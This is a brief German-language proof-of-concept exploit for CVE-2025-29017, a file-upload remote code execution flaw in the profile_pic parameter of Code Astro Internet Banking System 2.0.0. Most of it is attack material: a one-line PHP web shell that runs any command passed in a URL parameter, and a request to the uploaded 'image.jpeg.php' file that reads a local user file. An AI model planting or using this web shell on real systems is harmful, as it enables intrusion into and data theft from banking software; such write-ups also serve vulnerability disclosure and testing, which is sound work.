
Proof-of-concept-Exploit für CVE-2025-29017, der Remote-Codeausführung durch schädlichen Datei-Upload im Code Astro Internet Banking System 2.0.0 demonstriert.
Eine Remote Code Execution (RCE)-Schwachstelle existiert in Code Astro Internet Banking System 2.0.0 aufgrund einer unzureichenden Datei-Upload-Validierung im Parameter profile_pic innerhalb von pages_view_client.php. Angreifer können die Sicherheitsprüfungen umgehen, indem sie die Upload-Anfrage manipulieren, was zu beliebiger Codeausführung führt.
profile_pic-Parameter in pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
